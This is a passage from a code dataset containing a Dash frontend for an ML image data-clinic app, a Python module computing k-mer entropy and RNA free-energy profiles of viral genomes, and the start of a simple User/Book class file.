width=8),\n html.Div(id='dummy-output')]\n ),\n RESOURCES_SETUP\n ],\n fluid=True\n )\n ]\n)\n\n\n##### FILE MANAGER CALLBACKS ####\n@app.callback(\n Output(\"collapse\", \"is_open\"),\n Input(\"collapse-button\", \"n_clicks\"),\n Input(\"import-dir\", \"n_clicks\"),\n State(\"collapse\", \"is_open\")\n)\ndef toggle_collapse(collapse_button, import_button, is_open):\n '''\n This callback toggles the file manager\n Args:\n collapse_button: \"Open File Manager\" button\n import_button: Import button\n is_open: Open/close File Manager modal state\n '''\n if collapse_button or import_button:\n return not is_open\n return is_open\n\n\n@app.callback(\n Output(\"warning-modal\", \"is_open\"),\n Output(\"warning-msg\", \"children\"),\n Input(\"warning-cause\", \"data\"),\n Input(\"ok-button\", \"n_clicks\"),\n State(\"warning-modal\", \"is_open\"),\n prevent_initial_call=True\n)\ndef toggle_warning_modal(warning_cause, ok_n_clicks, is_open):\n '''\n This callback toggles a warning/error message\n Args:\n warning_cause: Cause that triggered the warning\n ok_n_clicks: Close the warning\n is_open: Close/open state of the warning\n '''\n changed_id = dash.callback_context.triggered[0]['prop_id']\n if 'ok-button.n_clicks' in changed_id:\n return not is_open, \"\"\n if warning_cause == 'wrong_dataset':\n return not is_open, \"The dataset you have selected is not supported. Please select (1) a data directory \" \\\n \"where each subfolder corresponds to a given category, OR (2) an NPZ file.\"\n if warning_cause == 'different_size':\n return not is_open, \"The number of images and labels do not match. Please select a different dataset.\"\n if warning_cause == 'no_row_selected':\n return not is_open, \"Please select a trained model from the List of Jobs\"\n if warning_cause == 'no_dataset':\n return not is_open, \"Please upload the dataset before submitting the job.\"\n else:\n return False, \"\"\n\n\n@app.callback(\n Output(\"modal\", \"is_open\"),\n Input(\"delete-files\", \"n_clicks\"),\n Input(\"confirm-delete\", \"n_clicks\"),\n State(\"modal\", \"is_open\")\n)\ndef toggle_modal(n1, n2, is_open):\n '''\n This callback toggles a confirmation message for file manager\n Args:\n n1: Delete files button\n n2: Confirm delete button\n is_open: Open/close confirmation modal state\n '''\n if n1 or n2:\n return not is_open\n return is_open\n\n\n@app.callback(\n Output(\"npz-modal\", \"is_open\"),\n Output(\"npz-img-key\", \"options\"),\n\n Input(\"import-dir\", \"n_clicks\"),\n Input(\"confirm-import\", \"n_clicks\"),\n Input(\"npz-img-key\", \"value\"),\n State(\"npz-modal\", \"is_open\"),\n State(\"docker-file-paths\", \"data\"),\n)\ndef toggle_modal_keyword(import_button, confirm_import, img_key, is_open, npz_path):\n '''\n This callback opens the modal to select the keywords within the NPZ file. When a keyword is selected for images or\n labels, this option is removed from the options of the other.\n Args:\n import_button: Import button\n confirm_import: Confirm import button\n img_key: Selected keyword for the images\n is_open: Open/close status of the modal\n npz_path: Path to NPZ file\n Returns:\n toggle_modal: Open/close modal\n img_options: Keyword options for images\n '''\n img_options = []\n toggle_modal = is_open\n changed_id = dash.callback_context.triggered[0]['prop_id']\n if npz_path:\n if npz_path[0].split('.')[-1] == 'npz':\n data = np.load(npz_path[0])\n img_key_list = list(data.keys())\n df_img = pd.DataFrame({'c': img_key_list})\n img_options = [{'label':i, 'value':i} for i in df_img['c']]\n toggle_modal = True\n if is_open and 'confirm-import.n_clicks' in changed_id:\n toggle_modal = False\n return toggle_modal, img_options\n\n\n@app.callback(\n Output('dummy-data', 'data'),\n Input('dash-uploader', 'isCompleted'),\n State('dash-uploader', 'fileNames')\n)\ndef upload_zip(iscompleted, upload_filename):\n '''\n This callback uploads a ZIP file\n Args:\n iscompleted: The upload operation is completed (bool)\n upload_filename: Filename of the uploaded content\n '''\n if not iscompleted:\n return 0\n if upload_filename is not None:\n path_to_zip_file = pathlib.Path(UPLOAD_FOLDER_ROOT) / upload_filename[0]\n if upload_filename[0].split('.')[-1] == 'zip': # unzip files and delete zip file\n zip_ref = zipfile.ZipFile(path_to_zip_file) # create zipfile object\n path_to_folder = pathlib.Path(UPLOAD_FOLDER_ROOT) / upload_filename[0].split('.')[-2]\n if (upload_filename[0].split('.')[-2] + '/') in zip_ref.namelist():\n zip_ref.extractall(pathlib.Path(UPLOAD_FOLDER_ROOT)) # extract file to dir\n else:\n zip_ref.extractall(path_to_folder)\n zip_ref.close() # close file\n os.remove(path_to_zip_file)\n return 0\n\n\n@app.callback(\n Output('files-table', 'data'),\n Output('docker-file-paths', 'data'),\n Output('data-path', 'data'),\n\n Input('browse-format', 'value'),\n Input('browse-dir', 'n_clicks'),\n Input('import-dir', 'n_clicks'),\n Input('confirm-delete', 'n_clicks'),\n Input('move-dir', 'n_clicks'),\n Input('files-table', 'selected_rows'),\n Input('data-path', 'data'),\n Input('import-format', 'value'),\n Input('my-toggle-switch', 'value'),\n Input('jobs-table', 'selected_rows'),\n Input(\"clear-data\", \"n_clicks\"),\n Input(\"refresh-data\", \"n_clicks\"),\n\n State('dest-dir-name', 'value'),\n State('jobs-table', 'data')\n)\ndef file_manager(browse_format, browse_n_clicks, import_n_clicks, delete_n_clicks, move_dir_n_clicks, rows,\n selected_paths, import_format, docker_path, job_rows, clear_data, refresh_data, dest, job_data):\n '''\n This callback displays manages the actions of file manager\n Args:\n browse_format: File extension to browse\n browse_n_clicks: Browse button\n import_n_clicks: Import button\n delete_n_clicks: Delete button\n move_dir_n_clicks: Move button\n rows: Selected rows\n selected_paths: Selected paths in cache\n import_format: File extension to import\n docker_path: [bool] docker vs local path\n job_rows: Selected rows in job table. If it's not a \"training\" model, it will load its results\n instead of the data uploaded through File Manager. This is so that the user can observe\n previous evaluation results\n dest: Destination path\n job_data: Data in job table\n clear_data: Clear the loaded images\n refresh_data: Refresh the loaded images\n Returns\n files: Filenames to be displayed in File Manager according to browse_format from docker/local path\n list_filename: List of selected filenames in the directory AND SUBDIRECTORIES FROM DOCKER PATH\n selected_files: List of selected filename FROM DOCKER PATH (no subdirectories)\n selected_row: Selected row in jobs table\n '''\n start = time.time()\n changed_id = dash.callback_context.triggered[0]['prop_id']\n\n supported_formats = []\n import_format = import_format.split(',')\n if import_format[0] == '*':\n supported_formats = ['tiff', 'tif', 'jpg', 'jpeg', 'png']\n else:\n for ext in import_format:\n supported_formats.append(ext.split('.')[1])\n\n files = []\n if browse_n_clicks or import_n_clicks:\n files = filename_list(DOCKER_DATA, browse_format)\n\n selected_files = []\n list_filename = []\n if bool(rows):\n for row in rows:\n file_path = files[row]\n selected_files.append(file_path)\n if file_path['file_type'] == 'dir':\n list_filename = add_paths_from_dir(file_path['file_path'], supported_formats, list_filename)\n else:\n list_filename.append(file_path['file_path'])\n\n if browse_n_clicks and changed_id == 'confirm-delete.n_clicks':\n for filepath in selected_files:\n if os.path.isdir(filepath['file_path']):\n shutil.rmtree(filepath['file_path'])\n else:\n os.remove(filepath['file_path'])\n selected_files = []\n files = filename_list(DOCKER_DATA, browse_format)\n\n if browse_n_clicks and changed_id == 'move-dir.n_clicks':\n if dest is None:\n dest = ''\n destination = DOCKER_DATA / dest\n destination.mkdir(parents=True, exist_ok=True)\n if bool(rows):\n sources = selected_paths\n for source in sources:\n if os.path.isdir(source['file_path']):\n move_dir(source['file_path'], str(destination))\n shutil.rmtree(source['file_path'])\n else:\n move_a_file(source['file_path'], str(destination))\n selected_files = []\n files = filename_list(DOCKER_DATA, browse_format)\n if not docker_path:\n files = docker_to_local_path(files, DOCKER_HOME, LOCAL_HOME)\n print(f'file manager callback {time.time()-start}')\n if changed_id == 'refresh-data.n_clicks':\n list_filename, selected_files = [], []\n datapath = requests.get(f'http://labelmaker-api:8005/api/v0/datapath/import_dataset').json()\n if datapath:\n if bool(datapath['datapath']) and os.path.isdir(datapath['datapath']['file_path'][0]):\n list_filename, selected_files = datapath['filenames'], datapath['datapath']['file_path'][0]\n return files, list_filename, selected_files\n \n elif changed_id == 'import-dir.n_clicks':\n return files, list_filename, selected_files\n \n elif changed_id == 'clear-data.n_clicks':\n return [], [], []\n \n else:\n return files, dash.no_update, dash.no_update\n\n\n##### DATA CLINIC CALLBACKS ####\n@app.callback(\n Output('app-parameters', 'children'),\n Input('model-selection', 'value'),\n Input('action', 'value')\n)\ndef load_parameters_and_content(model_selection, action_selection):\n '''\n This callback dynamically populates the parameters and contents of the website according to the selected action &\n model.\n Args:\n model_selection: Selected model (from content registry)\n action_selection: Selected action (pre-defined actions in Data Clinic)\n Returns:\n app-parameters: Parameters according to the selected model & action\n '''\n parameters = get_gui_components(model_selection, action_selection)\n gui_item = JSONParameterEditor(_id={'type': 'parameter_editor'}, # pattern match _id (base id), name\n json_blob=parameters,\n )\n gui_item.init_callbacks(app)\n return gui_item\n\n\n@app.callback(\n Output('orig_img', 'src'),\n Output('rec_img', 'src'),\n Output('ls_graph', 'src'),\n Output('img-slider', 'max'),\n Output('img-slider', 'value'),\n Output('data-size-out', 'children'),\n Output('current-image-label', 'children'),\n\n Input('import-dir', 'n_clicks'),\n Input('confirm-import', 'n_clicks'),\n Input({'type': ALL, 'param_key': 'latent_dim', 'name': 'latent_dim', 'layer': 'input'}, 'value'),\n Input({'type': ALL, 'param_key': 'target_width', 'name': 'target_width'}, 'value'),\n Input({'type': ALL, 'param_key': 'target_height', 'name': 'target_height'}, 'value'),\n Input('img-slider', 'value'),\n Input('action', 'value'),\n Input('jobs-table', 'selected_rows'),\n Input('jobs-table', 'data'),\n Input(\"docker-file-paths\", \"data\"),\n \n State(\"npz-img-key\", \"value\"),\n State(\"npz-modal\", \"is_open\"),\n)\ndef refresh_image(import_dir, confirm_import, ls_var, target_width, target_height, img_ind, action_selection, row,\n data_table, filenames, img_keyword, npz_modal):\n '''\n This callback updates the images in the display\n Args:\n import_dir: Import button\n confirm_import: Confirm import button\n ls_var: Latent space value\n target_width: Target data width (if resizing)\n target_height: Target data height (if resizing)\n img_ind: Index of image according to the slider value\n row: Selected job (model) \n data_table: Data in table of jobs\n filenames: Selected data files\n img_keyword: Keyword for images in NPZ file\n npz_modal: Open/close status of NPZ modal\n action_selection: Action selection (train vs test)\n Returns:\n img-output: Output figure\n img-reconst-output: Reconstructed output (if prediction is selected, ow. blank image)\n latent-space-plot: Graphical representation of latent space definition\n img-slider-max: Maximum value of the slider according to the dataset (train vs test)\n img-slider-value: Value of the slider according to the dataset length\n data-size-out: Size of uploaded data\n '''\n start = time.time()\n current_im_label = ''\n changed_id = [p['prop_id'] for p in dash.callback_context.triggered][0]\n print(f'changed id: {changed_id}')\n if action_selection in ['train_model', 'transfer_learning']:\n if len(ls_var) > 0:\n ls_var = int(ls_var[0])\n target_width = int(target_width[0])\n target_height = int(target_height[0])\n ls_plot = get_bottleneck(ls_var, target_width, target_height)\n else:\n ls_plot = dash.no_update\n else:\n ls_plot = get_bottleneck(1, 1, 1, False)\n target_width = None\n if row:\n if row[0] < len(data_table):\n if data_table[row[0]]['job_type'].split()[0] == 'train_model':\n if action_selection == 'prediction_model':\n train_params = str_to_dict(data_table[row[0]]['parameters'])\n ls_var = int(train_params['latent_dim'])\n target_width = int(train_params['target_width'])\n target_height = int(train_params['target_height'])\n ls_plot = get_bottleneck(ls_var, target_width, target_height)\n else:\n supported_formats = ['tiff', 'tif', 'jpg', 'jpeg', 'png']\n filenames = add_paths_from_dir(data_table[row[0]]['dataset'], supported_formats, [])\n job_id = data_table[row[0]]['experiment_id']\n reconstructed_path = 'data/mlexchange_store/{}/{}/'.format(USER, job_id)\n #reconstructed_path = 'data/mlexchange_store/{}/{}/reconstructed_images.npy'.format(USER, job_id)\n try:\n slider_max = len(filenames)\n img_ind = min(slider_max, img_ind)\n reconst_img= Image.open(f'{reconstructed_path}{img_ind}.jpg')\n #reconstructed_data = np.load(reconstructed_path)\n #slider_max = reconstructed_data.shape[0]\n #img_ind = min(slider_max, img_ind)\n #reconst_img = Image.fromarray((np.squeeze((reconstructed_data[img_ind] -\n # np.min(reconstructed_data[img_ind])) * 255)).astype(np.uint8))\n except Exception:\n print('Reconstructed images are not ready')\n indx = data_table[row[0]]['parameters'].find('Training Parameters:')\n train_params = str_to_dict(data_table[row[0]]['parameters'][indx + 21:])\n ls_var = int(train_params['latent_dim'])\n target_width = int(train_params['target_width'])\n target_height = int(train_params['target_height'])\n if 'img-slider.value' in changed_id:\n ls_plot = dash.no_update\n else:\n ls_plot = get_bottleneck(ls_var, target_width, target_height)\n\n if len(filenames) > 0:\n try:\n if filenames[0].split('.')[-1] == 'npz': # npz file\n if img_keyword is not None:\n current_im_label = filenames[0]\n data_npz = np.load(filenames[0])\n data_npy = np.squeeze(data_npz[img_keyword])\n slider_max = len(data_npy) - 1\n img_ind = min(slider_max, img_ind)\n origimg = data_npy[img_ind]\n else: # directory\n slider_max = len(filenames) - 1\n if img_ind > slider_max:\n img_ind = 0\n origimg = Image.open(filenames[img_ind])\n current_im_label = filenames[img_ind]\n except Exception as e:\n print(f'Exception in refresh_image callback {e}')\n if 'origimg' not in locals():\n origimg = Image.fromarray((np.zeros((32,32)).astype(np.uint8)))\n slider_max = 0\n (width, height) = origimg.size\n if 'reconst_img' not in locals():\n reconst_img = Image.fromarray((np.zeros(origimg.size).astype(np.uint8)))\n if target_width:\n origimg = plot_figure(origimg.resize((target_width, target_height)))\n recimg = plot_figure(reconst_img.resize((target_width, target_height)))\n data_size = 'Original Image: (' + str(width) + 'x' + str(height) + '). Resized Image: (' + \\\n str(target_width) + 'x' + str(target_height) + ').'\n else:\n origimg = plot_figure(origimg)\n recimg = plot_figure(reconst_img)\n data_size = 'Original Image: (' + str(width) + 'x' + str(height) + \\\n '). Choose a trained model to update the graph.'\n print(f'Time in callback {time.time()-start}')\n return origimg, recimg, ls_plot, slider_max, img_ind, data_size, 'Image: '+current_im_label\n\n\n@app.callback(\n Output('jobs-table', 'data'),\n Output('loss-plot', 'figure'),\n Output('show-plot', 'is_open'),\n Output('log-modal', 'is_open'),\n Output('log-display', 'children'),\n Output('jobs-table', 'active_cell'),\n\n Input('interval', 'n_intervals'),\n Input('jobs-table', 'selected_rows'),\n Input('jobs-table', 'active_cell'),\n Input('modal-close', 'n_clicks'),\n\n State('jobs-table', 'data'),\n State('loss-plot', 'figure'),\n prevent_initial_call=True\n)\ndef update_table(n, row, active_cell, close_clicks, current_job_table, current_fig):\n '''\n This callback updates the job table, loss plot, and results according to the job status in the compute service.\n Args:\n n: Time intervals that triggers this callback\n row: Selected row (job)\n active_cell: Selected cell in table of jobs\n close_clicks: Close pop-up window\n current_job_table: Current job table\n current_fig: Current loss plot\n Returns:\n jobs-table: Updates the job table\n loss-plot: Updates the loss plot according to the job status (logs)\n show-plot: Shows/hides the loss plot\n log-modal: Open/close pop-up window\n log-display: Contents of pop-up window\n jobs-table: Selects/deselects the active cell in job table. Without this output, the pop-up window will not\n close\n '''\n changed_id = [p['prop_id'] for p in dash.callback_context.triggered][0]\n if 'modal-close.n_clicks' in changed_id:\n return dash.no_update, dash.no_update, dash.no_update, False, dash.no_update, None\n job_list = get_job(USER, 'data_clinic')\n data_table = []\n if job_list is not None:\n for job in job_list:\n params = str(job['job_kwargs']['kwargs']['params'])\n if job['job_kwargs']['kwargs']['job_type'].split()[0] != 'train_model':\n params = params + '\\nTraining Parameters: ' + str(job['job_kwargs']['kwargs']['train_params'])\n data_table.insert(0,\n dict(\n job_id=job['uid'],\n name=job['description'],\n job_type=job['job_kwargs']['kwargs']['job_type'],\n status=job['status']['state'],\n parameters=params,\n experiment_id=job['job_kwargs']['kwargs']['experiment_id'],\n dataset=job['job_kwargs']['kwargs']['dataset'],\n job_logs=job['logs'])\n )\n is_open = dash.no_update\n log_display = dash.no_update\n if active_cell:\n row_log = active_cell[\"row\"]\n col_log = active_cell[\"column_id\"]\n if col_log == 'job_logs': # show job logs\n is_open = True\n log_display = dcc.Textarea(value=data_table[row_log][\"job_logs\"],\n style={'width': '100%', 'height': '30rem', 'font-family':'monospace'})\n if col_log == 'parameters': # show job parameters\n is_open = True\n log_display = dcc.Textarea(value=data_table[row_log][\"parameters\"],\n style={'width': '100%', 'height': '30rem', 'font-family': 'monospace'})\n fig = go.Figure(go.Scatter(x=[], y=[]))\n show_plot = False\n if row:\n if row[0] < len(data_table):\n log = data_table[row[0]][\"job_logs\"]\n if log:\n if data_table[row[0]]['job_type'].split()[0] == 'train_model':\n start = log.find('epoch')\n if start > -1 and len(log) > start + 25:\n try:\n fig = generate_loss_plot(log, start)\n show_plot = True\n except Exception as e:\n print(f'Loss plot exception {e}')\n if current_fig:\n #if len(fig['data'])>0:\n try:\n if current_fig['data'][0]['x'] == list(fig['data'][0]['x']):\n fig = dash.no_update\n except Exception as e:\n print(e)\n if data_table == current_job_table:\n data_table = dash.no_update\n return data_table, fig, show_plot, is_open, log_display, None\n\n\n@app.callback(\n Output('jobs-table', 'selected_rows'),\n Input('deselect-row', 'n_clicks'),\n prevent_initial_call=True\n)\ndef deselect_row(n_click):\n '''\n This callback deselects the row in the data table\n '''\n return []\n\n\n@app.callback(\n Output('delete-modal', 'is_open'),\n Input('confirm-delete-row', 'n_clicks'),\n Input('delete-row', 'n_clicks'),\n Input('stop-row', 'n_clicks'),\n State('jobs-table', 'selected_rows'),\n State('jobs-table', 'data'),\n prevent_initial_call=True\n)\ndef delete_row(confirm_delete, delete, stop, row, job_data):\n '''\n This callback deletes the selected model in the table\n '''\n changed_id = [p['prop_id'] for p in dash.callback_context.triggered][0]\n if 'delete-row.n_clicks' == changed_id:\n return True\n elif 'stop-row.n_clicks' == changed_id:\n job_uid = job_data[row[0]]['job_id']\n requests.patch(f'http://job-service:8080/api/v0/jobs/{job_uid}/terminate')\n return False\n else:\n job_uid = job_data[row[0]]['job_id']\n requests.delete(f'http://job-service:8080/api/v0/jobs/{job_uid}/delete')\n return False\n\n\n@app.callback(\n Output('resources-setup', 'is_open'),\n Output('counters', 'data'),\n Output(\"warning-cause\", \"data\"),\n\n Input('execute', 'n_clicks'),\n Input('submit', 'n_clicks'),\n\n State('app-parameters', 'children'),\n State('num-cpus', 'value'),\n State('num-gpus', 'value'),\n State('action', 'value'),\n State('jobs-table', 'data'),\n State('jobs-table', 'selected_rows'),\n State('data-path', 'data'),\n State(\"docker-file-paths\", \"data\"),\n State(\"counters\", \"data\"),\n State(\"npz-img-key\", \"value\"),\n State(\"model-name\", \"value\"),\n prevent_intial_call=True)\ndef execute(execute, submit, children, num_cpus, num_gpus, action_selection, job_data, row, data_path, filenames,\n counters, x_key, model_name):\n '''\n This callback submits a job request to the compute service according to the selected action & model\n Args:\n execute: Execute button\n submit: Submit button\n children: Model parameters\n num_cpus: Number of CPUs assigned to job\n num_gpus: Number of GPUs assigned to job\n action_selection: Action selected\n job_data: Lists of jobs\n row: Selected row (job)\n data_path: Local path to data\n counters: List of counters to assign a number to each job according to its action (train vs evaluate)\n filenames: List of filenames within this dataset\n x_key: Keyword for x data in NPZ file\n Returns:\n open/close the resources setup modal\n '''\n changed_id = [p['prop_id'] for p in dash.callback_context.triggered][0]\n if 'execute.n_clicks' in changed_id:\n if len(filenames) == 0:\n return False, counters, 'no_dataset'\n if action_selection != 'train_model' and not row:\n return False, counters, 'no_row_selected'\n if row:\n if action_selection != 'train_model' and job_data[row[0]]['job_type'].split()[0] != 'train_model':\n return False, counters, 'no_row_selected'\n return True, counters, ''\n if 'submit.n_clicks' in changed_id:\n counters = get_counter(USER)\n experiment_id = str(uuid.uuid4())\n out_path = pathlib.Path('data/mlexchange_store/{}/{}'.format(USER, experiment_id))\n out_path.mkdir(parents=True, exist_ok=True)\n input_params = {'data_key': x_key}\n if bool(children):\n for child in children['props']['children']:\n key = child[\"props\"][\"children\"][1][\"props\"][\"id\"][\"param_key\"]\n value = child[\"props\"][\"children\"][1][\"props\"][\"value\"]\n input_params[key] = value\n try:\n data_path = data_path[0]['file_path']\n except Exception as e:\n print(e)\n json_dict = input_params\n kwargs = {}\n if action_selection == 'train_model':\n counters[0] = counters[0] + 1\n count = counters[0]\n command = \"python3 src/train_model.py\"\n directories = [data_path, str(out_path)]\n else:\n counters[1] = counters[1] + 1\n count = counters[1]\n training_exp_id = job_data[row[0]]['experiment_id']\n in_path = pathlib.Path('data/mlexchange_store/{}/{}'.format(USER, training_exp_id))\n kwargs = {'train_params': job_data[row[0]]['parameters']}\n train_params = str_to_dict(job_data[row[0]]['parameters'])\n json_dict['target_width'] = train_params['target_width']\n json_dict['target_height'] = train_params['target_height']\n if action_selection == 'prediction_model':\n command = \"python3 src/predict_model.py\"\n directories = [data_path, str(in_path) , str(out_path)]\n if len(model_name)==0: # if model_name was not defined\n model_name = f'{action_selection} {count}'\n job = SimpleJob(service_type='backend',\n description=model_name,\n working_directory='{}'.format(DATA_DIR),\n uri='mlexchange1/unsupervised-classifier',\n cmd= ' '.join([command] + directories + ['\\''+json.dumps(json_dict)+'\\'']),\n kwargs = {'job_type': action_selection,\n 'experiment_id': experiment_id,\n 'dataset': data_path,\n 'params': json_dict,\n **kwargs})\n job.submit(USER, num_cpus, num_gpus)\n return False, counters, ''\n return False, counters, ''\n\n\nif __name__ == \"__main__\":\n app.run_server(debug=True, host='0.0.0.0', port=8072)\n","repo_name":"mlexchange/mlex_data_clinic","sub_path":"src/frontend.py","file_name":"frontend.py","file_ext":"py","file_size_in_byte":39978,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"71120604257","text":"import pandas as pd\nimport numpy as np\nimport os\nfrom tqdm import tqdm\nimport re\nfrom Bio import SeqIO, Phylo\nimport math\nfrom Bio.Seq import Seq\nimport random\nimport scipy.stats as stats\nimport statsmodels.stats.multitest as multi\nimport RNA\nfrom random import sample\nimport glob\nfrom functools import reduce\n\n# k-mers distribution based entropy measures.\ndef entropy_by_kmer(seq, k):\n \"\"\"\n calculate the entropy of a sequence according to its k-mers\n :param seq: a genome string\n :param k: size of the k-mer to use\n :return: entropy\n \"\"\"\n\n # update kmers\n kmers = {}\n for i in range(len(seq) - k):\n kmer = seq[i:i+k]\n if kmer in kmers:\n kmers[kmer] += 1\n else:\n kmers[kmer] = 1\n\n # calculate entropy\n total_kmers = sum(kmers.values())\n entropy = 0\n for kmer in kmers:\n p = kmers[kmer] / total_kmers\n entropy += -(p * math.log2(p))\n\n return entropy\n\ndef joint_entropy (seq1, seq2, k):\n \"\"\"\n calculates the joint entropy of two sequences.\n :param seq1: sequence #1\n :param seq2: sequence #2\n :param k: k-mer length\n :return: joint entropy value\n \"\"\"\n\n kmers_1 = {}\n kmers_2 = {}\n\n # kmers in sequence #1\n for i in range(len(seq1) - k):\n kmer = seq1[i:i+k]\n if kmer in kmers_1:\n kmers_1[kmer] += 1\n else:\n kmers_1[kmer] = 1\n\n for i in range(len(seq2) - k):\n kmer = seq2[i:i+k]\n if kmer in kmers_2:\n kmers_2[kmer] += 1\n else:\n kmers_2[kmer] = 1\n\n # calculate joint entropy\n total_kmers_1 = sum(kmers_1.values())\n total_kmers_2 = sum(kmers_2.values())\n\n total = total_kmers_1 + total_kmers_2\n\n # compare the kmers space to be equal at both\n for kmer in kmers_1:\n if kmer not in kmers_2:\n kmers_2[kmer] = 0\n\n for kmer in kmers_2:\n if kmer not in kmers_1:\n kmers_2[kmer] = 0\n\n joint_entropy = 0\n for kmer1 in kmers_1:\n for kmer2 in kmers_2:\n p_xy = (kmers_1[kmer1] + kmers_2[kmer2]) / total\n\n joint_entropy += -(p_xy * math.log2(p_xy))\n\n return joint_entropy\n\n\ndef information_storage (seq1, seq2, k):\n \"\"\"\n calculates the information storage of two sequences.\n :param seq1: sequence #1\n :param seq2: sequence #2\n :param k: k-mer length\n :return: information storage value\n \"\"\"\n\n kmers_1 = {}\n kmers_2 = {}\n\n # kmers in sequence #1\n for i in range(len(seq1) - k):\n kmer = seq1[i:i+k]\n if kmer in kmers_1:\n kmers_1[kmer] += 1\n else:\n kmers_1[kmer] = 1\n\n for i in range(len(seq2) - k):\n kmer = seq2[i:i+k]\n if kmer in kmers_2:\n kmers_2[kmer] += 1\n else:\n kmers_2[kmer] = 1\n\n # calculate joint entropy\n total_kmers_1 = sum(kmers_1.values())\n total_kmers_2 = sum(kmers_2.values())\n\n total = total_kmers_1 + total_kmers_2\n\n # compare the kmers space to be equal at both\n for kmer in kmers_1:\n if kmer not in kmers_2:\n kmers_2[kmer] = 0\n\n for kmer in kmers_2:\n if kmer not in kmers_1:\n kmers_2[kmer] = 0\n\n inf_storage = 0\n for kmer1 in kmers_1:\n for kmer2 in kmers_2:\n\n p_xy = (kmers_1[kmer1] + kmers_2[kmer2]) / total\n p_x = kmers_1[kmer1] / total_kmers_1\n p_y = kmers_2[kmer2] / total_kmers_2\n\n if p_x == 0 or p_y == 0:\n continue\n inf_storage += p_xy * math.log2(p_xy/(p_x*p_y))\n\n return inf_storage\n\n\n\ndef get_reverse_complement(seq):\n \"\"\"\n get reverse complement genome\n :param seq: a genome sequence\n :return: a string of reverse complement\n \"\"\"\n seq = Seq(seq)\n reverse_complement = seq.reverse_complement()\n return reverse_complement\n\n\n\n# shuffle scrambler for a sequence.\ndef _scrambler(word):\n word_to_scramble = list(word)\n random.shuffle(word_to_scramble)\n new_word = ''.join(word_to_scramble)\n return new_word\n\ndef scrambler(word):\n new_word = _scrambler(word)\n while new_word == word and len(word) > 1:\n new_word = _scrambler(word)\n return new_word\n\n\n\n\n######## entropy profiles calculation ##################\ndef get_joint_entropy_profile(fasta, w, k=5, out=None, data_type='fasta'):\n \"\"\"\n sliding window entropy profile of all sequences in a family\n :param fasta: a fasta file contatining viral sequences\n :param w: the window size\n :param out: optional. if != None a profile will be saved as a png\n :return: the vector of profile entropy\n \"\"\"\n all_entropies = {}\n alias = os.path.basename(fasta).split('.')[0]\n\n i = 0\n for rec in tqdm(SeqIO.parse(fasta, data_type)):\n entropies = []\n # get identifier and genomic sequence\n\n genome = str(rec.seq)\n\n for j in range(len(genome) - w):\n sub_genome = genome[j:j+w]\n rc_sub_genome = str(get_reverse_complement(sub_genome))\n entropy = joint_entropy(sub_genome, rc_sub_genome, k)\n entropies.append(entropy)\n\n\n all_entropies['seq_{}'.format(i)] = entropies\n i += 1\n\n df = pd.DataFrame(dict([(k,pd.Series(v)) for k,v in all_entropies.items()]))\n if out != None:\n df.to_csv(os.path.join(out, '{}_Joint_profile.csv'.format(alias)), index=False)\n\n return df\n\n\n\ndef get_entropy_profile(fasta, w, k=5, out=None, data_type='fasta'):\n \"\"\"\n sliding window entropy profile of all sequences in a family\n :param fasta: a fasta file contatining viral sequences\n :param w: the window size\n :param out: optional. if != None a profile will be saved as a png\n :return: the vector of profile entropy\n \"\"\"\n all_entropies = {}\n alias = os.path.basename(fasta).split('.')[0]\n\n i = 0\n for rec in tqdm(SeqIO.parse(fasta, data_type)):\n entropies = []\n # get identifier and genomic sequence\n\n genome = str(rec.seq)\n\n for j in range(len(genome) - w):\n sub_genome = genome[j:j+w]\n entropy = entropy_by_kmer(sub_genome, k)\n entropies.append(entropy)\n\n\n\n all_entropies['seq_{}'.format(i)] = entropies\n i += 1\n\n df = pd.DataFrame(dict([(k,pd.Series(v)) for k,v in all_entropies.items()]))\n\n if out != None:\n df.to_csv(os.path.join(out, '{}_Shannon_profile.csv'.format(alias)), index=False)\n\n return df\n\ndef deltaG_calculator(seq):\n \"\"\"\n calculate the minimum free energy (G) for a given sequence\n :param seq: an rna sequence\n :return: minimum free energy\n \"\"\"\n ss, mfe = RNA.fold(seq)\n return mfe\n\ndef get_deltaG_profile(fasta, w, out=None, data_type='fasta'):\n\n \"\"\"\n sliding window free energy profile of all sequences in a family\n :param fasta: a fasta file contatining viral sequences\n :param w: the window size\n :param out: output file\n :return: the vector of profile entropy\n \"\"\"\n all_deltaG = {}\n alias = os.path.basename(fasta).split('.')[0]\n\n i = 0\n for rec in tqdm(SeqIO.parse(fasta, data_type)):\n values = []\n\n genome = str(rec.seq)\n\n for j in range(len(genome) - w):\n sub_genome = genome[j:j+w]\n mfe = deltaG_calculator(sub_genome)\n values.append(mfe)\n\n\n all_deltaG['seq_{}'.format(i)] = values\n i += 1\n\n df = pd.DataFrame(dict([(k,pd.Series(v)) for k,v in all_deltaG.items()]))\n if out != None:\n df.to_csv(os.path.join(out, '{}_deltaG_profile.csv'.format(alias)), index=False)\n\n return df\n","repo_name":"daniellemiller/LabProjects","sub_path":"InformationEntropy/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":7542,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"40609704026","text":"class User(object):\n\tdef __init__(self, name, email):\n\t\tself.name = name\n\t\tself.email = email\n\t\tself.books = {}\n\n\tdef get_email(self):\n\t\treturn self.email\n\n\tdef change_email(self, address):\n\t\tself.email = address\n\t\tprint(\"The email address has successfully been changed to {0}.\".format(self.email))\n\n\tdef __repr__(self):\n\t\tif len(self.books) < 2:\n\t\t\treturn \"User {user}, email: {email}, has read {n} book.\".format(user=self.name, email=self.email, n=len(self.books))\n\t\telse:\n\t\t\treturn \"User {user}, email: {email}, has read {n} books.\".format(user=self.name, email=self.email, n=len(self.books))\n\n\tdef __eq__(self, other):\n\t\treturn self.name == other.name and self.email == other.email\n\n\tdef __ne__(self, other):\n\t\treturn self.name != other.name and self.email != other.email\n\n\tdef read_book(self, book, rating=None):\n\t\tself.books[book] = rating\n\t\tbook.ratings.append(rating)\n\n\tdef get_average_rating(self):\n\t\ttotal = 0\n\t\ti = 0\n\t\tfor value in self.books.values():\n\t\t\tif value:\n\t\t\t\ttotal += value\n\t\t\t\ti += 1\n\t\ttry:\n\t\t\treturn total / i\n\t\texcept ZeroDivisionError:\n\t\t\treturn 0\n\nclass Book(object):\n\tdef __init__(self, title, isbn, price):\n\t\tself.title = title\n\t\tself.isbn = isbn\n\t\tself.price = price\n\t\tself.ratings = []\n\n\tdef get_title(self):\n\t\treturn self.title\n\n\tdef 